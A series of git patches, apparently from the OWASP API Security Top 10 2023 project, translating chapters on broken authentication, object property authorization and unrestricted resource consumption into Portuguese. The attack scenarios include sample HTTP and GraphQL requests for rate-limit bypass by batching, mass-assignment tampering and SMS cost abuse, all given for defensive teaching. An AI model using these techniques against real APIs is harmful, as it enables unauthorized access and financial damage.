request rate limiting, speeding up the attack: +Para efetuar login por força bruta com a conta de uma vítima, os atores +maliciosos aproveitam o agrupamento de consultas GraphQL para contornar a +limitação temporal restritiva de pedidos, acelerando o ataque: ``` POST /graphql From 1216010ef43c4b4b8c6f46114e7b0b0c41fd338d Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Tue, 23 Apr 2024 20:40:59 +0100 Subject: [PATCH 22/64] Update 0xa2-broken-authentication.md --- .../2023/pt-pt/0xa2-broken-authentication.md | 60 ++++++++++--------- 1 file changed, 32 insertions(+), 28 deletions(-) diff --git a/editions/2023/pt-pt/0xa2-broken-authentication.md b/editions/2023/pt-pt/0xa2-broken-authentication.md index d9d480d46..46525ca39 100644 --- a/editions/2023/pt-pt/0xa2-broken-authentication.md +++ b/editions/2023/pt-pt/0xa2-broken-authentication.md @@ -74,8 +74,8 @@ POST /graphql ## Cenário #2 -In order to update the email address associated with a user's account, clients -should issue an API request like the one below: +Para atualizar o endereço de email associado à conta de um utilizador, os +clientes devem enviar um pedido API como o exemplo abaixo: ``` PUT /account @@ -84,35 +84,39 @@ Authorization: Bearer { "email": "" } ``` -Because the API does not require users to confirm their identity by providing -their current password, bad actors able to put themselves in a position to -steal the auth token might be able to take over the victim's account by starting -the reset password workflow after updating the email address of the victim's -account. +Devido à API não exigir que os utilizadores confirmem a sua identidade +fornecendo a sua _password_ atual, atores maliciosos que consigam colocar-se numa +posição de roubar o token de autenticação podem conseguir assumir a conta da +vítima ao iniciar o processo de redefinição de senha após atualizar o endereço +de email da conta da vítima. ## Como Prevenir -* Make sure you know all the possible flows to authenticate to the API - (mobile/ web/deep links that implement one-click authentication/etc.). Ask - your engineers what flows you missed. -* Read about your authentication mechanisms. Make sure you understand what and - how they are used. OAuth is not authentication, and neither are API keys. -* Don't reinvent the wheel in authentication, token generation, or password - storage. Use the standards. -* Credential recovery/forgot password endpoints should be treated as login - endpoints in terms of brute force, rate limiting, and lockout protections. -* Require re-authentication for sensitive operations (e.g. changing the account - owner email address/2FA phone number). -* Use the [OWASP Authentication Cheatsheet][1]. -* Where possible, implement multi-factor authentication. -* Implement anti-brute force mechanisms to mitigate credential stuffing, - dictionary attacks, and brute force attacks on your authentication endpoints. - This mechanism should be stricter than the regular rate limiting mechanisms - on your APIs. -* Implement [account lockout][2]/captcha mechanisms to prevent brute force - attacks against specific users. Implement weak-password checks. -* API keys should not be used for user authentication. They should only be used - for [API clients][3] authentication. +* Certifique-se de que conhece todos os fluxos de autenticação possíveis (e.g. + móvel/web/_deeplinks_/etc.). Pergunte aos engenheiros responsáveis quais os + fluxos em falta/não identificados. +* Leia sobre os mecanismos de autenticação em uso. Certifique-se que compreende + quais e como são usados. OAuth não é um mecanismo de autenticação, assim como + também não o são as API _keys_. +* Não reinvente a roda em termos de autenticação, geração de _tokens_, + armazenamento de _passwords_. Opte pela utilização de standards. +* _Endpoints_ para recuperação de _password_ devem ser tratados como os + _endpoints_ de _login_ no que diz respeito à proteção contra ataques de força + bruta, limitação do número de pedidos e bloqueio de conta. +* Exija nova autenticação para operações sensíveis (por exemplo, alterar o + endereço de email do proprietário da conta/número de telefone para + autenticação de dois fatores). +* Utilize a [OWASP Authentication Cheatsheet][1]. +* Sempre que possível implemente autenticação de múltiplos fatores. +* Implemente mecanismos anti-força bruta para mitigar ataques do tipo + _credential stuffing_, dicionário e força bruta nos _endpoints_ de + autenticação. Este mecanismo deve ter configurações mais restritivas do que + para os demais _endpoints_ da API. +* Implemente [mecanismos de bloqueio de conta][2] / _captcha_ para prevenir + ataques de força bruta contra utilizadores específicos. Implemente verificação + da qualidade/força das _passwords_. +* As API _keys_ não devem ser usadas para autenticação dos utilizadores. Apenas + devem ser usadas para autenticação dos [clientes da API][3]. ## Referências From 50e0dc8ff76efbd40effd1c8077143549177340f Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Tue, 23 Apr 2024 21:04:36 +0100 Subject: [PATCH 23/64] Update 0xa3-broken-object-property-level-authorization.md --- ...ken-object-property-level-authorization.md | 22 +++++++++---------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md b/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md index 172e75d3b..3384ab4ab 100644 --- a/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md +++ b/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md @@ -1,17 +1,17 @@ # API3:2023 Broken Object Property Level Authorization -| Threat agents/Attack vectors | Security Weakness | Impacts | +| Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | -| API Specific : Exploitability **Easy** | Prevalence **Common** : Detectability **Easy** | Technical **Moderate** : Business Specific | +| Específico da API : Abuso **Fácil** | Prevalência **Comum** : Deteção **Fácil** | Técnico **Moderado** : Específico Negócio | | APIs tend to expose endpoints that return all object’s properties. This is particularly valid for REST APIs. For other protocols such as GraphQL, it may require crafted requests to specify which properties should be returned. Identifying these additional properties that can be manipulated requires more effort, but there are a few automated tools available to assist in this task. | Inspecting API responses is enough to identify sensitive information in returned objects’ representations. Fuzzing is usually used to identify additional (hidden) properties. Whether they can be changed is a matter of crafting an API request and analyzing the response. Side-effect analysis may be required if the target property is not returned in the API response. | Unauthorized access to private/sensitive object properties may result in data disclosure, data loss, or data corruption. Under certain circumstances, unauthorized access to object properties can lead to privilege escalation or partial/full account takeover. | -## Is the API Vulnerable? +## A API é vulnerável? When allowing a user to access an object using an API endpoint, it is important to validate that the user has access to the specific object properties they are trying to access. -An API endpoint is vulnerable if: +Um _endpoint_ de uma API é vulnerável se: * The API endpoint exposes properties of an object that are considered sensitive and should not be read by the user. (previously named: "[Excessive @@ -20,9 +20,9 @@ An API endpoint is vulnerable if: sensitive object's property which the user should not be able to access (previously named: "[Mass Assignment][2]") -## Example Attack Scenarios +## Exemplos de Cenários de Ataque -### Scenario #1 +### Cenário #1 A dating app allows a user to report other users for inappropriate behavior. As part of this flow, the user clicks on a "report" button, and the following @@ -54,7 +54,7 @@ The API Endpoint is vulnerable since it allows the authenticated user to have access to sensitive (reported) user object properties, such as "fullName" and "recentLocation" that are not supposed to be accessed by other users. -### Scenario #2 +### Cenário #2 An online marketplace platform, that offers one type of users ("hosts") to rent out their apartment to another type of users ("guests"), requires the host to @@ -85,7 +85,7 @@ The API endpoint is vulnerable because there is no validation that the host should have access to the internal object property - `total_stay_price`, and the guest will be charged more than she was supposed to be. -### Scenario #3 +### Cenário #3 A social network that is based on short videos, enforces restrictive content filtering and censorship. Even if an uploaded video is blocked, the user can @@ -114,7 +114,7 @@ should have access to the internal object property - `blocked`, and the user can change the value from `true` to `false` and unlock their own blocked content. -## How To Prevent +## Como Prevenir * When exposing an object using an API endpoint, always make sure that the user should have access to the object's properties you expose. @@ -131,7 +131,7 @@ content. * Keep returned data structures to the bare minimum, according to the business/functional requirements for the endpoint. -## References +## Referências ### OWASP @@ -139,7 +139,7 @@ content. * [API6:2019 - Mass Assignment - OWASP API Security Top 10 2019][2] * [Mass Assignment Cheat Sheet][3] -### External +### Externas * [CWE-213: Exposure of Sensitive Information Due to Incompatible Policies][4] * [CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes][5] From 4e3e338d5146e9548fb82873023bca39dea1d06c Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Thu, 25 Apr 2024 10:59:16 +0100 Subject: [PATCH 24/64] Update 0xa3-broken-object-property-level-authorization.md --- .../pt-pt/0xa3-broken-object-property-level-authorization.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md b/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md index 3384ab4ab..8693910f6 100644 --- a/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md +++ b/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md @@ -3,7 +3,7 @@ | Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | | Específico da API : Abuso **Fácil** | Prevalência **Comum** : Deteção **Fácil** | Técnico **Moderado** : Específico Negócio | -| APIs tend to expose endpoints that return all object’s properties. This is particularly valid for REST APIs. For other protocols such as GraphQL, it may require crafted requests to specify which properties should be returned. Identifying these additional properties that can be manipulated requires more effort, but there are a few automated tools available to assist in this task. | Inspecting API responses is enough to identify sensitive information in returned objects’ representations. Fuzzing is usually used to identify additional (hidden) properties. Whether they can be changed is a matter of crafting an API request and analyzing the response. Side-effect analysis may be required if the target property is not returned in the API response. | Unauthorized access to private/sensitive object properties may result in data disclosure, data loss, or data corruption. Under certain circumstances, unauthorized access to object properties can lead to privilege escalation or partial/full account takeover. | +| As APIs tendem a expor _endpoints_ que devolvem todas as propriedades do objeto. Isto é especialmente válido para APIs REST. Para outros protocolos como o GraphQL, pode ser necessário enviar pedidos elaborados para especificar que propriedades devem ser devolvidas. Identificar estas propriedades adicionais que podem ser manipuladas requer mais esforço, mas existem algumas ferramentas automatizadas disponíveis para ajudar nesta tarefa. | Inspecionar as respostas da API é suficiente para identificar informações sensíveis nas representações dos objetos devolvidos. _Fuzzing_ é geralmente usado para identificar propriedades adicionais (ocultas). Determinar se podem ser alteradas depende da elaboração de um pedido à API e da análise da resposta. Pode ser necessária uma análise de efeitos secundários se a propriedade alvo não for devolvida na resposta da API. | O acesso não autorizado a propriedades privadas/sensíveis de objetos pode resultar na divulgação de dados, perda de dados ou corrupção de dados. Em certas circunstâncias, o acesso não autorizado a propriedades de objetos pode levar a elevação de privilégios ou a apropriação parcial/completa de conta. | ## A API é vulnerável? From 64f3cd00630c0c2444d49ac0d6b0ff7b43edf658 Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Thu, 25 Apr 2024 11:41:13 +0100 Subject: [PATCH 25/64] Update 0xa3-broken-object-property-level-authorization.md --- ...ken-object-property-level-authorization.md | 51 ++++++++++--------- 1 file changed, 26 insertions(+), 25 deletions(-) diff --git a/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md b/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md index 8693910f6..3ef104c2b 100644 --- a/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md +++ b/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md @@ -7,26 +7,26 @@ ## A API é vulnerável? -When allowing a user to access an object using an API endpoint, it is important -to validate that the user has access to the specific object properties they are -trying to access. +Ao permitir que um utilizador aceda a um objeto através de um _endpoint_ da +API, é importante validar que o utilizador tem acesso às propriedades +específicas do objeto que está a tentar aceder. Um _endpoint_ de uma API é vulnerável se: -* The API endpoint exposes properties of an object that are considered - sensitive and should not be read by the user. (previously named: "[Excessive - Data Exposure][1]") -* The API endpoint allows a user to change, add/or delete the value of a - sensitive object's property which the user should not be able to access - (previously named: "[Mass Assignment][2]") +* O _endpoint_ da API expõe propriedades de um objeto que são consideradas + sensíveis e não devem ser lidas pelo utilizador. (anteriormente denominado: + "[Excessive Data Exposure][1]") +* O _endpoint_ da API permite que um utilizador altere, adicione ou elimine o + valor de uma propriedade sensível de um objeto ao qual o utilizador não deve + ter acesso. (anteriormente denominado: "[Mass Assignment][2]") ## Exemplos de Cenários de Ataque ### Cenário #1 -A dating app allows a user to report other users for inappropriate behavior. -As part of this flow, the user clicks on a "report" button, and the following -API call is triggered: +Uma aplicação de encontros permite a um utilizador denunciar outros utilizadores +por comportamento inadequado. Como parte deste processo, o utilizador clica num +botão de 'denúncia', e é desencadeada a seguinte chamada de API: ``` POST /graphql @@ -50,18 +50,20 @@ POST /graphql } ``` -The API Endpoint is vulnerable since it allows the authenticated user to have -access to sensitive (reported) user object properties, such as "fullName" and -"recentLocation" that are not supposed to be accessed by other users. +O endpoint da API é vulnerável porque permite que o utilizador autenticado +tenha acesso a propriedades sensíveis do utilizador denunciado, como +"fullName" (nome completo) e "recentLocation" (localização recente), que não +deveriam estar accessíveis a outros utilizadores. ### Cenário #2 -An online marketplace platform, that offers one type of users ("hosts") to rent -out their apartment to another type of users ("guests"), requires the host to -accept a booking made by a guest, before charging the guest for the stay. +Uma plataforma de mercado online, que permite a um tipo de utilizadores +('anfitriões') alugar o seu apartamento a outro tipo de utilizadores +('hóspedes'), requer que o anfitrião aceite uma reserva feita por um +hóspede antes de cobrar ao hóspede pela estadia. -As part of this flow, an API call is sent by the host to -`POST /api/host/approve_booking` with the following legitimate payload: +Como parte deste processo, é feito um pedido de API pelo anfitrião para +`POST /api/host/approve_booking` com o seguinte conteúdo legítimo: ``` { @@ -70,8 +72,7 @@ As part of this flow, an API call is sent by the host to } ``` -The host replays the legitimate request, and adds the following malicious -payload: +O anfitrião reenvia o pedido legítimo e adiciona o seguinte conteúdo malicioso: ``` { @@ -81,9 +82,9 @@ payload: } ``` -The API endpoint is vulnerable because there is no validation that the host -should have access to the internal object property - `total_stay_price`, and -the guest will be charged more than she was supposed to be. +O _endpoint_ da API é vulnerável porque não há validação de que o anfitrião +deve ter acesso à propriedade interna do objeto - `total_stay_price`, e o +hóspede vai ser cobrado mais do que deveria. ### Cenário #3 From 3fe0b5cff791b286ba1318bf865669bf4fc58999 Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Thu, 25 Apr 2024 15:42:43 +0100 Subject: [PATCH 26/64] Update 0xa3-broken-object-property-level-authorization.md --- ...ken-object-property-level-authorization.md | 47 ++++++++++--------- 1 file changed, 24 insertions(+), 23 deletions(-) diff --git a/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md b/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md index 3ef104c2b..b82db1bdb 100644 --- a/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md +++ b/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md @@ -88,9 +88,10 @@ hóspede vai ser cobrado mais do que deveria. ### Cenário #3 -A social network that is based on short videos, enforces restrictive content -filtering and censorship. Even if an uploaded video is blocked, the user can -change the description of the video using the following API request: +Uma rede social baseada em vídeos curtos, impõe filtros restritivos de +conteúdo e censura. Mesmo que um vídeo carregado seja bloqueado, o +utilizador pode alterar a descrição do vídeo utilizando o seguinte pedido à +API: ``` PUT /api/video/update_video @@ -100,8 +101,8 @@ PUT /api/video/update_video } ``` -A frustrated user can replay the legitimate request, and add the following -malicious payload: +Um utilizador frustrado pode reenviar o pedido legítimo e adicionar o +seguinte conteúdo malicioso: ``` { @@ -110,27 +111,27 @@ malicious payload: } ``` -The API endpoint is vulnerable because there is no validation if the user -should have access to the internal object property - `blocked`, and the user -can change the value from `true` to `false` and unlock their own blocked -content. +O _endpoint_ da API é vulnerável porque não há validação se o utilizador +deve ter acesso à propriedade interna do objeto - `blocked`, e o utilizador +pode alterar o valor de `true` para `false` e desbloquear o seu próprio +conteúdo bloqueado. ## Como Prevenir -* When exposing an object using an API endpoint, always make sure that the user - should have access to the object's properties you expose. -* Avoid using generic methods such as `to_json()` and `to_string()`. Instead, - cherry-pick specific object properties you specifically want to return. -* If possible, avoid using functions that automatically bind a client's input - into code variables, internal objects, or object properties - ("Mass Assignment"). -* Allow changes only to the object's properties that should be updated by the - client. -* Implement a schema-based response validation mechanism as an extra layer of - security. As part of this mechanism, define and enforce data returned by all - API methods. -* Keep returned data structures to the bare minimum, according to the - business/functional requirements for the endpoint. +* Ao expor um objeto através de um _endpoint_ da API, certifique-se sempre + de que o utilizador deve ter acesso às propriedades do objeto que expõe. +* Evite usar métodos genéricos como `to_json()` e `to_string()`. Em vez disso, + selecione especificamente as propriedades do objeto que deseja retornar. +* Se possível, evite usar funções que automaticamente vinculem os dados + provenientes do cliente em variáveis de código, objetos internos ou + propriedades de objetos ("Mass Assignment"). +* Permita alterações apenas nas propriedades do objeto que devam ser + atualizadas pelo cliente. +* Implemente um mecanismo de validação de resposta baseado num esquema como + uma camada extra de segurança. Como parte deste mecanismo, defina e imponha + que dados são retornados por todos os métodos da API. +* Mantenha as estruturas de dados retornadas ao mínimo essencial, de acordo + com os requisitos comerciais/funcionais para o _endpoint_. ## Referências From 6ae5633eefce5664013f495b5d9e34124a14257a Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Thu, 25 Apr 2024 17:21:24 +0100 Subject: [PATCH 27/64] Update 0xa5-broken-function-level-authorization.md --- .../2023/pt-pt/0xa5-broken-function-level-authorization.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md b/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md index 0bb3f432d..72f3b21cb 100644 --- a/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md +++ b/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md @@ -1,8 +1,8 @@ # API5:2023 Broken Function Level Authorization -| Threat agents/Attack vectors | Security Weakness | Impacts | +| Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | -| API Specific : Exploitability **Easy** | Prevalence **Common** : Detectability **Easy** | Technical **Severe** : Business Specific | +| Específico da API : Abuso **Fácil** | Prevalência **Comum** : Deteção **Fácil** | Técnico **Grave** : Específico Negócio | | Exploitation requires the attacker to send legitimate API calls to an API endpoint that they should not have access to as anonymous users or regular, non-privileged users. Exposed endpoints will be easily exploited. | Authorization checks for a function or resource are usually managed via configuration or code level. Implementing proper checks can be a confusing task since modern applications can contain many types of roles, groups, and complex user hierarchies (e.g. sub-users, or users with more than one role). It's easier to discover these flaws in APIs since APIs are more structured, and accessing different functions is more predictable. | Such flaws allow attackers to access unauthorized functionality. Administrative functions are key targets for this type of attack and may lead to data disclosure, data loss, or data corruption. Ultimately, it may lead to service disruption. | ## Is the API Vulnerable? From c51bd08b9ccc6ca89020dd92604e816544cb72a1 Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Thu, 25 Apr 2024 17:24:36 +0100 Subject: [PATCH 28/64] Update 0xa4-unrestricted-resource-consumption.md --- .../0xa4-unrestricted-resource-consumption.md | 20 +++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md b/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md index cf2862b03..e2f1e4f6d 100644 --- a/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md +++ b/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md @@ -1,11 +1,11 @@ # API4:2023 Unrestricted Resource Consumption -| Threat agents/Attack vectors | Security Weakness | Impacts | +| Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | -| API Specific : Exploitability **Average** | Prevalence **Widespread** : Detectability **Easy** | Technical **Severe** : Business Specific | +| Específico da API : Abuso **Moderado** | Prevalência **Predominante** : Deteção **Fácil** | Técnico **Grave** : Específico Negócio | | Exploitation requires simple API requests. Multiple concurrent requests can be performed from a single local computer or by using cloud computing resources. Most of the automated tools available are designed to cause DoS via high loads of traffic, impacting APIs’ service rate. | It's common to find APIs that do not limit client interactions or resource consumption. Crafted API requests, such as those including parameters that control the number of resources to be returned and performing response status/time/length analysis should allow identification of the issue. The same is valid for batched operations. Although threat agents don't have visibility over costs impact, this can be inferred based on service providers’ (e.g. cloud provider) business/pricing model. | Exploitation can lead to DoS due to resource starvation, but it can also lead to operational costs increase such as those related to the infrastructure due to higher CPU demand, increasing cloud storage needs, etc. | -## Is the API Vulnerable? +## A API é vulnerável? Satisfying API requests requires resources such as network bandwidth, CPU, memory, and storage. Sometimes required resources are made available by service @@ -25,9 +25,9 @@ inappropriately (e.g. too low/high): * Number of records per page to return in a single request-response * Third-party service providers' spending limit -## Example Attack Scenarios +## Exemplos de Cenários de Ataque -### Scenario #1 +### Cenário #1 A social network implemented a “forgot password” flow using SMS verification, enabling the user to receive a one time token via SMS in order to reset their @@ -65,7 +65,7 @@ times. The back-end follows and requests Willyo to send tens of thousands of text messages, leading the company to lose thousands of dollars in a matter of minutes. -### Scenario #2 +### Cenário #2 A GraphQL API Endpoint allows the user to upload a profile picture. @@ -108,7 +108,7 @@ Because the API does not limit the number of times the `uploadPic` operation can be attempted, the call will lead to exhaustion of server memory and Denial of Service. -### Scenario #3 +### Cenário #3 A service provider allows clients to download arbitrarily large files using its API. These files are stored in cloud object storage and they don't change that @@ -121,7 +121,7 @@ clients immediately start pulling the new version. Because there were no consumption cost alerts, nor a maximum cost allowance for the cloud service, the next monthly bill increases from US$13, on average, to US$8k. -## How To Prevent +## Como Prevenir * Use a solution that makes it easy to limit [memory][1], [CPU][2], [number of restarts][3], [file descriptors, and processes][4] such @@ -144,7 +144,7 @@ the next monthly bill increases from US$13, on average, to US$8k. setting spending limits is not possible, billing alerts should be configured instead. -## References +## Referências ### OWASP @@ -152,7 +152,7 @@ the next monthly bill increases from US$13, on average, to US$8k. * ["DoS Prevention" - GraphQL Cheat Sheet][6] * ["Mitigating Batching Attacks" - GraphQL Cheat Sheet][7] -### External +### Externas * [CWE-770: Allocation of Resources Without Limits or Throttling][8] * [CWE-400: Uncontrolled Resource Consumption][9] From 9174154082a6edcdb247eccc4f51971e707b0831 Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Thu, 25 Apr 2024 17:33:15 +0100 Subject: [PATCH 29/64] Update 0xd1-acknowledgments.md --- editions/2023/pt-pt/0xd1-acknowledgments.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/editions/2023/pt-pt/0xd1-acknowledgments.md b/editions/2023/pt-pt/0xd1-acknowledgments.md index 19bfb30a3..3ca938307 100644 --- a/editions/2023/pt-pt/0xd1-acknowledgments.md +++ b/editions/2023/pt-pt/0xd1-acknowledgments.md @@ -1,9 +1,9 @@ -# Acknowledgments +# Agradecimentos -## Acknowledgments to Contributors +## Agradecimento ao Contribuidores -We'd like to thank the following contributors who contributed publicly on -GitHub, or via other means: +Gostaríamos de agradecer às pessoas abaixo, as quais contribuíram publicamente +no GitHub ou por outros meios: 247arjun, abunuwas, Alissa Knight, Arik Atar, aymenfurter, Corey J. Ball, cyn8, d0znpp, Dan Gordon, donge, Dor Tumarkin, faizzaidi, gavjl, guybensimhon, Inês From 48821c7d477ebf3fc0adefd55f3839e909e01e6d Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Fri, 26 Apr 2024 08:31:14 +0100 Subject: [PATCH 30/64] Update 0xa4-unrestricted-resource-consumption.md --- .../0xa4-unrestricted-resource-consumption.md | 37 ++++++++++--------- 1 file changed, 19 insertions(+), 18 deletions(-) diff --git a/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md b/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md index e2f1e4f6d..df4a7441f 100644 --- a/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md +++ b/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md @@ -3,27 +3,28 @@ | Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | | Específico da API : Abuso **Moderado** | Prevalência **Predominante** : Deteção **Fácil** | Técnico **Grave** : Específico Negócio | -| Exploitation requires simple API requests. Multiple concurrent requests can be performed from a single local computer or by using cloud computing resources. Most of the automated tools available are designed to cause DoS via high loads of traffic, impacting APIs’ service rate. | It's common to find APIs that do not limit client interactions or resource consumption. Crafted API requests, such as those including parameters that control the number of resources to be returned and performing response status/time/length analysis should allow identification of the issue. The same is valid for batched operations. Although threat agents don't have visibility over costs impact, this can be inferred based on service providers’ (e.g. cloud provider) business/pricing model. | Exploitation can lead to DoS due to resource starvation, but it can also lead to operational costs increase such as those related to the infrastructure due to higher CPU demand, increasing cloud storage needs, etc. | +| A exploração requer pedidos simples de API. Múltiplos pedidos concorrentes podem ser feitos a partir de um único computador local ou utilizando recursos de computação em nuvem. A maioria das ferramentas automatizadas disponíveis são projetadas para causar DoS (Negação de Serviço) através de altas cargas de tráfego, afetando a taxa de serviço das APIs. | É comum encontrar APIs que não limitam as interações do cliente ou o consumo de recursos. Pedidos de API elaborados, como aqueles que incluem parâmetros que controlam o número de recursos a serem retornados e realizam análises de estado/tempo/comprimento de resposta, devem permitir a identificação do problema. O mesmo vale para operações em quantidade. Embora os agentes maliciosos não tenham visibilidade sobre o impacto nos custos, isso pode ser inferido com base no modelo de negócios/preços dos fornecedores de serviços (por exemplo, fornecedor de nuvem). | A exploração pode levar a uma Negação de Serviço (DoS) devido à escassez de recursos, mas também pode resultar num aumento dos custos operacionais, como os relacionados à infraestrutura devido à maior exigência de CPU, aumento das necessidades de armazenamento em nuvem, etc. | ## A API é vulnerável? -Satisfying API requests requires resources such as network bandwidth, CPU, -memory, and storage. Sometimes required resources are made available by service -providers via API integrations, and paid for per request, such as sending -emails/SMS/phone calls, biometrics validation, etc. - -An API is vulnerable if at least one of the following limits is missing or set -inappropriately (e.g. too low/high): - -* Execution timeouts -* Maximum allocable memory -* Maximum number of file descriptors -* Maximum number of processes -* Maximum upload file size -* Number of operations to perform in a single API client request (e.g. GraphQL - batching) -* Number of records per page to return in a single request-response -* Third-party service providers' spending limit +Para atender aos pedidos feitos à API, são necessários recursos como largura de +banda de rede, CPU, memória e armazenamento. Às vezes, os recursos necessários +são disponibilizados por provedores de serviços por meio de integrações de API +e são pagos por pedido, como o envio de emails/SMS/chamadas telefónicas, +validação biométrica, etc. + +Uma API é vulnerável se pelo menos um dos seguintes limites estiver ausente ou +definido inadequadamente (por exemplo, muito baixo/alto): + +* Tempos limite de execução +* Memória máxima alocável +* Número máximo de descritores de ficheiro +* Número máximo de processos +* Tamanho máximo de upload de ficheiro +* Número de operações a serem realizadas num único pedido do cliente da API + (por exemplo, agrupamento GraphQL) +* Número de registros por página a serem retornados num único pedido-resposta +* Limite de gastos de provedores de serviços terceiros ## Exemplos de Cenários de Ataque From c7204f5cef9678f208e864618b3baf7d59742b25 Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Fri, 17 May 2024 13:17:39 +0100 Subject: [PATCH 31/64] Update 0xa4-unrestricted-resource-consumption.md --- .../0xa4-unrestricted-resource-consumption.md | 104 ++++++++++-------- 1 file changed, 56 insertions(+), 48 deletions(-) diff --git a/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md b/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md index df4a7441f..6c8fd6a9e 100644 --- a/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md +++ b/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md @@ -30,12 +30,12 @@ definido inadequadamente (por exemplo, muito baixo/alto): ### Cenário #1 -A social network implemented a “forgot password” flow using SMS verification, -enabling the user to receive a one time token via SMS in order to reset their -password. +Uma rede social implementou um mecanismo de "recuperar senha" através da +verificação por SMS, permitindo que o utilizador receba um _token_ de uso +único via SMS para redefinir a sua senha. -Once a user clicks on "forgot password" an API call is sent from the user's -browser to the back-end API: +Uma vez que o utilizador clica em "recuperar senha", é feita uma chamada API +a partir do navegador do utilizador para a API de _back-end_: ``` POST /initiate_forgot_password @@ -46,8 +46,8 @@ POST /initiate_forgot_password } ``` -Then, behind the scenes, an API call is sent from the back-end to a 3rd party -API that takes care of the SMS delivering: +Em seguida, nos bastidores, é feita uma chamada API do _back-end_ para uma API +de terceiros que se encarrega da entrega do SMS: ``` POST /sms/send_reset_pass_code @@ -59,16 +59,16 @@ Host: willyo.net } ``` -The 3rd party provider, Willyo, charges $0.05 per this type of call. +O fornecedor de terceiros, Willyo, cobra $0.05 por este tipo de chamada. -An attacker writes a script that sends the first API call tens of thousands of -times. The back-end follows and requests Willyo to send tens of thousands of -text messages, leading the company to lose thousands of dollars in a matter of -minutes. +Um atacante escreve código que envia a primeira chamada API dezenas de milhares +de vezes. O _back-end_ prossegue e solicita à Willyo que envie dezenas de +milhares de mensagens de texto, levando a empresa a perder milhares de dólares +em questão de minutos. ### Cenário #2 -A GraphQL API Endpoint allows the user to upload a profile picture. +Um _endpoint_ de API GraphQL permite que o utilizador carregue uma foto de perfil. ``` POST /graphql @@ -82,17 +82,17 @@ POST /graphql } ``` -Once the upload is complete, the API generates multiple thumbnails with -different sizes based on the uploaded picture. This graphical operation takes a -lot of memory from the server. +Uma vez concluído o carregamento, a API gera múltiplas miniaturas com diferentes +tamanhos com base na imagem carregada. Esta operação gráfica consome muita +memória do servidor. -The API implements a traditional rate limiting protection - a user can't access -the GraphQL endpoint too many times in a short period of time. The API also -checks for the uploaded picture's size before generating thumbnails to avoid -processing pictures that are too large. +A API implementa uma proteção tradicional de limitação de quantidade de pedidos +- um utilizador não pode aceder ao _endpoint_ GraphQL demasiadas vezes num curto +período de tempo. A API também verifica o tamanho da imagem carregada antes de +gerar as miniaturas para evitar o processamento de imagens demasiado grandes. -An attacker can easily bypass those mechanisms, by leveraging the flexible -nature of GraphQL: +Um atacante pode facilmente contornar esses mecanismos, aproveitando a natureza +flexível do GraphQL: ``` POST /graphql @@ -105,45 +105,53 @@ POST /graphql } ``` -Because the API does not limit the number of times the `uploadPic` operation can -be attempted, the call will lead to exhaustion of server memory and Denial of -Service. +Como a API não limita o número de vezes que a operação `uploadPic` pode ser +tentada, a chamada levará ao esgotamento da memória do servidor e à negação de +serviço (_Denial of Service_). ### Cenário #3 -A service provider allows clients to download arbitrarily large files using its -API. These files are stored in cloud object storage and they don't change that -often. The service provider relies on a cache service to have a better service -rate and 